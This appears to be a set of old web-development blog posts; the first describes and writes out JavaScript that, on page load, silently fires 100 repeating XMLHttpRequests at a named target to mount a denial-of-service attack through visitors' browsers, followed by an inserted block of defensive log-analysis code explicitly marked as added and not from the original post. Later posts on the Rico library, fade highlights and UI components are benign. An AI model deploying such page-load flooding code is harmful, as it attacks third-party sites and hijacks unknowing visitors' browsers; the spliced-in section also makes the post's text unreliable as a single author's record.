XMLHTTPRequest for Denial of Service

Maybe the XMLHTTPRequest handler isn’t such a good idea…

Right, so I was thinking about the XMLHTTPRequest handler. Well, okay, actually, I was thinking of Sandra Bullock, and this idea popped into my head…

You can use XMLHTTPRequests to make requests of a web server. Fair enough. And you can make requests of another site – check. And you can make many of them on one page – yup. And finally, you don’t have to do anything with the response – you see where I’m going with this yet?

Assume you have a function for creating XMLHTTPRequest objects. Consider the following:
var urlTarget = 'www.example.com'; // The site we want to DOS
var aStack = array();

function fnHTTP (oHTTP) {
    return function () {
        if (oHTTP.readyState == 3) {
            oHTTP.open("GET", urlTarget, true);
            oHTTP.send(null);
        }
    }
}

function setupDOS () {
    for (i=0; i<100; i++ ) {

        oHTTP = GetXMLHTTPRequest();
        oHTTP.open("GET", urlTarget, true);
        oHTTP.onreadystatechange = fnHTTP(oHTTP);
        oHTTP.send(null);

        aStack.push( oHTTP );
    }
}

window.onload = setupDOS;

So, a user goes to a page. In the background, after they’ve loaded the page, JavaScript is creating a whole load of XMLHTTPRequest objects, and then using these to make requests of a target site. And as each object gets serviced, it makes another request.
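
From the receiving site's side, traffic generated this way tends to arrive in bursts that all name the same third-party page in the Referer header. The following is an added example, not code from the original post: a log check that flags such bursts, assuming the requests carry a Referer and using a constructed entry format (`ts`, `ip`, `path`, `referer`) with hypothetical host names.

```javascript
// Added example: flag third-party pages whose visitors are flooding this site.
// Entry fields (ts in epoch seconds, ip, path, referer) are a constructed format.
function findRefererFloods(entries, ownHost, windowSec = 10, minRequests = 200) {
  const buckets = new Map(); // "refererHost|windowIndex" -> { requests, clients }
  for (const e of entries) {
    let host;
    try {
      host = new URL(e.referer).host;
    } catch {
      continue; // missing or malformed Referer: nothing to attribute
    }
    if (host === ownHost) continue; // same-site navigation is expected traffic
    const key = host + "|" + Math.floor(e.ts / windowSec);
    const b = buckets.get(key) || { requests: 0, clients: new Set() };
    b.requests += 1;
    b.clients.add(e.ip);
    buckets.set(key, b);
  }
  const worst = new Map(); // refererHost -> busiest window seen
  for (const [key, b] of buckets) {
    if (b.requests < minRequests) continue;
    const host = key.slice(0, key.lastIndexOf("|"));
    const prev = worst.get(host);
    if (!prev || b.requests > prev.requests) {
      worst.set(host, { referer: host, requests: b.requests, clients: b.clients.size });
    }
  }
  return [...worst.values()];
}

// Constructed sample: 3 visitors of one page each account for 100 requests,
// plus ordinary traffic from a search result, the site itself, and no Referer.
function buildSampleLog() {
  const log = [];
  for (let c = 0; c < 3; c++) {
    for (let i = 0; i < 100; i++) {
      log.push({ ts: 1000 + (i % 5), ip: "198.51.100." + (10 + c), path: "/",
                 referer: "http://blog.example.net/post.html" });
    }
  }
  log.push({ ts: 1001, ip: "203.0.113.7", path: "/", referer: "http://search.example.org/?q=x" });
  log.push({ ts: 1002, ip: "203.0.113.8", path: "/about", referer: "http://www.example.com/" });
  log.push({ ts: 1003, ip: "203.0.113.9", path: "/", referer: "" });
  return log;
}

console.log(findRefererFloods(buildSampleLog(), "www.example.com"));
```

Requests that arrive without a Referer are skipped by this check, so it complements per-client rate limiting rather than replacing it.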

Played with Rico…

I had a play with Rico then. Pretty good, generally. Some neat effects, and I like the way they do rounded corners – clever. Doesn’t work too well with boxes that have outlines, but hey! Can’t have everything.

Also, I found a bug in the way their Drag and Drop functionality works. If you click a node in the DOM beneath the node that is draggable, you get a Javascript error. I emailed them with a fix for that.

My only complaint about this Library – I’d prefer to have it as a selection of different Libraries. It seems a shame to have to lump them all together for some small bits of user interface. For example, I’d be willing to have Drag and Drop that doesn’t neatly ‘slide’ back to its original position if not dropped on a Drop Zone. Having that in the UI means including LOTS of extra code. I pulled the Drag and Drop code out into a separate file – I’ll publish it and the fix at some point soon.

An interesting technique

Here’s an interesting technique of drawing a user’s eye to an area on a page, by using a colour that fades after a couple of seconds. I know that it’s supposed to be for areas updated by the user (and I can think of at least one project for doing this), but it might work elsewhere. I must give this a go, see what it’s actually like. It’s going to either be really good, or really bad…

(Update – having migrated my blog to WordPress, I find that it uses this technique. And it’s quite nice. It works well)

Working on Web UI Components

So, this whole ‘Ajax’ thing set me thinking – why not try to make all ‘normal’ user interface components – date, numeric, combo boxes, autosuggestion boxes, image rollovers, menus, tooltips, etc. – why not make them all into libraries that you can include in a page, and then configure through the attributes of a node. E.g.
<input name='someDate' type='text' value='' subtype='date'
format='yyyy-mm-ddd'>

Then the .js file you include reads inputs, finds dates, and adds the functionality you need.

I’ve already done this for combo boxes – I’ll put it on my site soon – and so I started looking into menus, and found some neat things:

I didn’t know you could do so much with CSS. Clearly, it has come along since I last really got stuck into it!